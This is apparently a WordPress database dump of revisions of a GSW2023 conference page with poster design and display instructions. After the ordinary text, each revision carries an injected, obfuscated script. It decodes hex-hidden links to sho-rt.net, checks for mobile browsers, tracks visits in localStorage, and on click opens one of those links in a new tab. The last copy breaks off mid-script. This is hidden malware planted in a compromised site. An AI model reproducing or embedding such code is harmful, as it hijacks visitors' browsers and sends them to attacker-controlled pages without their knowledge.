(5135,1,'2023-08-13 16:39:38','2023-08-13 16:39:38','Poster Design and Presentation\r\nWhen you prepare your poster, please follow the instructions stated below:\r\n• Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n• Design the space allocation in your poster carefully using several well-balanced sections including title, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All sections should be well-presented using coloured paper or a colourfully painted border. Sections may be connected by arrows to show the flow of study.\r\n• There is no GSW 2023 poster template. You can use a template from your home institution.\r\n• Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger, the better.\r\n• Give each section a title and a brief explanation.\r\nPoster Display\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your poster should be displayed. The poster board for your poster will be marked with your paper number. The poster should be set up before the poster session starts and should stay on display until 17:30 hours. Adhesive tape (Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during the display according to the GSW2023 programme.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 16:39:38','2023-08-13 16:39:38','',5132,'https://gsw2023.com/?p=5135',0,'revision','',0),
(5136,1,'2023-08-13 21:10:22','2023-08-13 21:10:22','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\n\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\n Design the space allocation in your poster carefully using several well-balanced sections including\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\nmay be connected by arrows to show the flow of study.\n There is no GSW 2023 poster template. You can use a template from your home institution.\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\nthe better.\n Give each section a title and a brief explanation.\n\n&nbsp;\n\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\nthe display according to the GSW2023 Program Herehttps://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program.pdf\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-autosave-v1','','','2023-08-13 21:10:22','2023-08-13 21:10:22','',5132,'https://gsw2023.com/?p=5136',0,'revision','',0),
(5137,1,'2023-08-13 16:41:34','2023-08-13 16:41:34','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\nWhen you prepare your poster, please follow the instructions stated below:\r\n• Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n• Design the space allocation in your poster carefully using several well-balanced sections including title, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All sections should be well-presented using coloured paper or a colourfully painted border. Sections may be connected by arrows to show the flow of study.\r\n• There is no GSW 2023 poster template. You can use a template from your home institution.\r\n• Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger, the better.\r\n• Give each section a title and a brief explanation.\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your poster should be displayed. The poster board for your poster will be marked with your paper number. The poster should be set up before the poster session starts and should stay on display until 17:30 hours. Adhesive tape (Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during the display according to the GSW2023 programme.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 